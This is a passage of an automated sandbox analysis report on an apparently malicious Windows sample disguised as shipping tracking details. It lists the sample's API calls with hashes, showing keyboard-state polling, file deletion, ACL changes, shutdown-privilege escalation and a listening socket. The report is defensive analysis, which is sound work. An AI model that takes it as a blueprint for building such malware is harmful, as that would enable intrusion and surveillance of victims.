                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F2F1E5
                                                    • SetCurrentDirectoryW.KERNEL32(00F78920), ref: 00F2F203
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F2F20D
                                                    • FindClose.KERNEL32(00000000), ref: 00F2F21A
                                                    • FindClose.KERNEL32(00000000), ref: 00F2F22C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 1824444939-438819550
                                                    • Opcode ID: 67a036684e5f63e344797bf488106cdfd1d9d3801caa13a49c9707e6a75fa855
                                                    • Instruction ID: 382694cc14e6890d59ded3b4821d6f8377a71a4a30ac8f88d11c746deb25805b
                                                    • Opcode Fuzzy Hash: 67a036684e5f63e344797bf488106cdfd1d9d3801caa13a49c9707e6a75fa855
                                                    • Instruction Fuzzy Hash: A431A23690022DAADB109EB4FC49AEE77BC9F46370F104175E904E21A1DB70DE4DEA55
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F2A20F
                                                    • __swprintf.LIBCMT ref: 00F2A231
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F2A26E
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F2A293
                                                    • _memset.LIBCMT ref: 00F2A2B2
                                                    • _wcsncpy.LIBCMT ref: 00F2A2EE
                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F2A323
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F2A32E
                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00F2A337
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F2A341
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 2733774712-3457252023
                                                    • Opcode ID: b3c48196cfba51c5d392e06c43f6fd64120dc61ef97171ff891cd6a43e395484
                                                    • Instruction ID: 202cf29565af56f2d542e36701244fbea85d5ce18e853b655a1fbc2dd075c39b
                                                    • Opcode Fuzzy Hash: b3c48196cfba51c5d392e06c43f6fd64120dc61ef97171ff891cd6a43e395484
                                                    • Instruction Fuzzy Hash: 4D31C1B590015DABDB20DFA0DC49FEB37BCEF89750F1040B6FA08E2160EB7596489B65
                                                    APIs
                                                      • Part of subcall function 00F18202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F1821E
                                                      • Part of subcall function 00F18202: GetLastError.KERNEL32(?,00F17CE2,?,?,?), ref: 00F18228
                                                      • Part of subcall function 00F18202: GetProcessHeap.KERNEL32(00000008,?,?,00F17CE2,?,?,?), ref: 00F18237
                                                      • Part of subcall function 00F18202: HeapAlloc.KERNEL32(00000000,?,00F17CE2,?,?,?), ref: 00F1823E
                                                      • Part of subcall function 00F18202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F18255
                                                      • Part of subcall function 00F1829F: GetProcessHeap.KERNEL32(00000008,00F17CF8,00000000,00000000,?,00F17CF8,?), ref: 00F182AB
                                                      • Part of subcall function 00F1829F: HeapAlloc.KERNEL32(00000000,?,00F17CF8,?), ref: 00F182B2
                                                      • Part of subcall function 00F1829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F17CF8,?), ref: 00F182C3
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F17D13
                                                    • _memset.LIBCMT ref: 00F17D28
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F17D47
                                                    • GetLengthSid.ADVAPI32(?), ref: 00F17D58
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00F17D95
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F17DB1
                                                    • GetLengthSid.ADVAPI32(?), ref: 00F17DCE
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F17DDD
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00F17DE4
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F17E05
                                                    • CopySid.ADVAPI32(00000000), ref: 00F17E0C
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F17E3D
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F17E63
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F17E77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 3996160137-0
                                                    • Opcode ID: 5276c48efdfecd9d86a18647ba2d3803226afae6e4897a2c3fbc5d704953c9f4
                                                    • Instruction ID: 849920e186bf10036ec7a74f4e3791a938b29503e5319b8ec6a02aeadd0eca90
                                                    • Opcode Fuzzy Hash: 5276c48efdfecd9d86a18647ba2d3803226afae6e4897a2c3fbc5d704953c9f4
                                                    • Instruction Fuzzy Hash: E1617C75900209AFDF00DFA5DC44EEEBBB9FF44310F148169F819A62A1DB359E45EB60
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 3c$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_
                                                    • API String ID: 0-4228276721
                                                    • Opcode ID: 57455cc62df9ff373a472a68d0795caf09c85654d326c40ea1e55207bec5995c
                                                    • Instruction ID: c2bcbfd13cae01b28c599eb370c650a850bfe49e091d9bb19fdb6ae08f391e6a
                                                    • Opcode Fuzzy Hash: 57455cc62df9ff373a472a68d0795caf09c85654d326c40ea1e55207bec5995c
                                                    • Instruction Fuzzy Hash: 6A726C75E002199BDB24CF58C8807EEB7B5FF48710F14816BE959FB291EB709A81DB90
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 00F20097
                                                    • SetKeyboardState.USER32(?), ref: 00F20102
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00F20122
                                                    • GetKeyState.USER32(000000A0), ref: 00F20139
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00F20168
                                                    • GetKeyState.USER32(000000A1), ref: 00F20179
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00F201A5
                                                    • GetKeyState.USER32(00000011), ref: 00F201B3
                                                    • GetAsyncKeyState.USER32(00000012), ref: 00F201DC
                                                    • GetKeyState.USER32(00000012), ref: 00F201EA
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00F20213
                                                    • GetKeyState.USER32(0000005B), ref: 00F20221
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: a0987c58619bea77b399051a731311bba2ea35eb6a95fe57afca714c6b56c0a9
                                                    • Instruction ID: e97a2e8fa008819cf819015ca6bea593273d12a6da85cba13ddc25c11fcfca82
                                                    • Opcode Fuzzy Hash: a0987c58619bea77b399051a731311bba2ea35eb6a95fe57afca714c6b56c0a9
                                                    • Instruction Fuzzy Hash: 11511B31D043A829FB34DBA0A8547EABFB49F11390F08459ED9C2561C3DEA49B8CE761
                                                    APIs
                                                      • Part of subcall function 00F40E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F3FDAD,?,?), ref: 00F40E31
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F404AC
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F4054B
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F405E3
                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F40822
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F4082F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1240663315-0
                                                    • Opcode ID: 67a328fbb2bd4ae97fb1b709f140854db45002502a134acdcf5db57d2783e624
                                                    • Instruction ID: 5ddfe5bb50017ac8173112a15fea3bbbd9de892dd78368f0956420829503d187
                                                    • Opcode Fuzzy Hash: 67a328fbb2bd4ae97fb1b709f140854db45002502a134acdcf5db57d2783e624
                                                    • Instruction Fuzzy Hash: B8E17F31604204AFCB14DF28C985E2ABBE5FF89714F04856DF94ADB262DB31ED05DB92
                                                    APIs
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    • CoInitialize.OLE32 ref: 00F38403
                                                    • CoUninitialize.OLE32 ref: 00F3840E
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00F52BEC,?), ref: 00F3846E
                                                    • IIDFromString.OLE32(?,?), ref: 00F384E1
                                                    • VariantInit.OLEAUT32(?), ref: 00F3857B
                                                    • VariantClear.OLEAUT32(?), ref: 00F385DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 834269672-1287834457
                                                    • Opcode ID: c1c7dda7f6d185aceab50c50b2bf35143ae3030078353ddda1a4d42a84e57765
                                                    • Instruction ID: edc88cc7e3d7c8a10425cfd9b59fd059aac1543a2a622e6a0a755832674a8a4c
                                                    • Opcode Fuzzy Hash: c1c7dda7f6d185aceab50c50b2bf35143ae3030078353ddda1a4d42a84e57765
                                                    • Instruction Fuzzy Hash: E961C0716083129FC710DF24C848F6EB7E8AF457A4F04441DF9859B291CB78ED4AEB92
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: c14079d6d28cc11f74d8cb3a095c0627674613d7161ac78eb4f5f2446bf9315a
                                                    • Instruction ID: d6d20665208313f5a751b88cef2df6945cab824d1737d3112310bd8418487633
                                                    • Opcode Fuzzy Hash: c14079d6d28cc11f74d8cb3a095c0627674613d7161ac78eb4f5f2446bf9315a
                                                    • Instruction Fuzzy Hash: CA21B13A6006149FDB01AF60DC09B6A7BA8EF15720F118029FD4AEB2A1DB70BD01EB54
                                                    APIs
                                                      • Part of subcall function 00EC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC4743,?,?,00EC37AE,?), ref: 00EC4770
                                                      • Part of subcall function 00F24A31: GetFileAttributesW.KERNEL32(?,00F2370B), ref: 00F24A32
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F238A3
                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00F2394B
                                                    • MoveFileW.KERNEL32(?,?), ref: 00F2395E
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00F2397B
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F2399D
                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00F239B9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 4002782344-1173974218
                                                    • Opcode ID: e362ebb1a6b1f6f6a2e8ed951ff8f2a7150af9ca287a2ffc4435ba06971c8ae3
                                                    • Instruction ID: 75b396850887187c4d1204baad542c8d684d0bb4c4f89ab804b290a03769c98d
                                                    • Opcode Fuzzy Hash: e362ebb1a6b1f6f6a2e8ed951ff8f2a7150af9ca287a2ffc4435ba06971c8ae3
                                                    • Instruction Fuzzy Hash: 1351D27180515C9ACF01EBA0DA92EEDB7B9AF15310F600069E446B7191EF362F4EDF51
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00F2F440
                                                    • Sleep.KERNEL32(0000000A), ref: 00F2F470
                                                    • _wcscmp.LIBCMT ref: 00F2F484
                                                    • _wcscmp.LIBCMT ref: 00F2F49F
                                                    • FindNextFileW.KERNEL32(?,?), ref: 00F2F53D
                                                    • FindClose.KERNEL32(00000000), ref: 00F2F553
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                    • String ID: *.*
                                                    • API String ID: 713712311-438819550
                                                    • Opcode ID: 5512fffeb8db90a349477e3e0080b9cebfe07462e7233e89b6f2884d0d169c3e
                                                    • Instruction ID: 14e05edd59973da005ddb2c12eda37d99b630f11b617712e5fe0e5630d9fbc1e
                                                    • Opcode Fuzzy Hash: 5512fffeb8db90a349477e3e0080b9cebfe07462e7233e89b6f2884d0d169c3e
                                                    • Instruction Fuzzy Hash: B9417B71C1021A9BCF10EF64DC49AEEBBB4FF55320F14407AE819A2291DB319A89EF50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __itow__swprintf
                                                    • String ID: 3c$_
                                                    • API String ID: 674341424-4099079164
                                                    • Opcode ID: 160a0797f980236e737dce38accf11b726543828189d98728b77fa7be5b6a45d
                                                    • Instruction ID: de5c9f310c3201e8c358b6121ab20a4a72d1f224ae7b0c1121474a9266fa4551
                                                    • Opcode Fuzzy Hash: 160a0797f980236e737dce38accf11b726543828189d98728b77fa7be5b6a45d
                                                    • Instruction Fuzzy Hash: 7A229A716083019FC724DF24C981BAEB7E4EF84314F00592EF89AA7391DB75E946DB92
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    • Opcode ID: 87b1443a5b8e6cb311a16b473250f38b231024cc5db59491af17bb315da63e9b
                                                    • Instruction ID: b66201acff6b68044cf9f24e096bfb5ad4e8721e77c5170b23a4646a9c507f52
                                                    • Opcode Fuzzy Hash: 87b1443a5b8e6cb311a16b473250f38b231024cc5db59491af17bb315da63e9b
                                                    • Instruction Fuzzy Hash: 3E12A971A00609DBDF04CFA5DA81AEEB3F5FF48310F10552AE806B7290EB76AD91DB50
                                                    APIs
                                                      • Part of subcall function 00EC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC4743,?,?,00EC37AE,?), ref: 00EC4770
                                                      • Part of subcall function 00F24A31: GetFileAttributesW.KERNEL32(?,00F2370B), ref: 00F24A32
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F23B89
                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F23BD9
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F23BEA
                                                    • FindClose.KERNEL32(00000000), ref: 00F23C01
                                                    • FindClose.KERNEL32(00000000), ref: 00F23C0A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 2649000838-1173974218
                                                    • Opcode ID: efed34373b3a70ae3596d1ea2d58f1cb3606c28baa212087bf9f19634ded1226
                                                    • Instruction ID: d5fb6f4d0b2644583931431a19a3cb95a6362a0e692a27ed9afbee60fefb0daa
                                                    • Opcode Fuzzy Hash: efed34373b3a70ae3596d1ea2d58f1cb3606c28baa212087bf9f19634ded1226
                                                    • Instruction Fuzzy Hash: 6931B0710083959BC300EF24D991DAFB7E8AEA5310F401D2DF8E5A2191EB35DA0EDB53
                                                    APIs
                                                      • Part of subcall function 00F187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F1882B
                                                      • Part of subcall function 00F187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F18858
                                                      • Part of subcall function 00F187E1: GetLastError.KERNEL32 ref: 00F18865
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00F251F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                    • String ID: $@$SeShutdownPrivilege
                                                    • API String ID: 2234035333-194228
                                                    • Opcode ID: 874f36feab9ed0b7cf71afbe7160d9743d9ed8fb6b18244b60934f49830a488d
                                                    • Instruction ID: 5026eac0291a6e63f5fce4e4f69c9a3538ff93fc6850b708ce06869f752a84ba
                                                    • Opcode Fuzzy Hash: 874f36feab9ed0b7cf71afbe7160d9743d9ed8fb6b18244b60934f49830a488d
                                                    • Instruction Fuzzy Hash: 61017B36B91635ABF7282268BC8BFBB7258EB15B60F240421FD07E20C2DA745C01B190
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00F362DC
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F362EB
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00F36307
                                                    • listen.WSOCK32(00000000,00000005), ref: 00F36316
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F36330
                                                    • closesocket.WSOCK32(00000000), ref: 00F36344
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketlistensocket
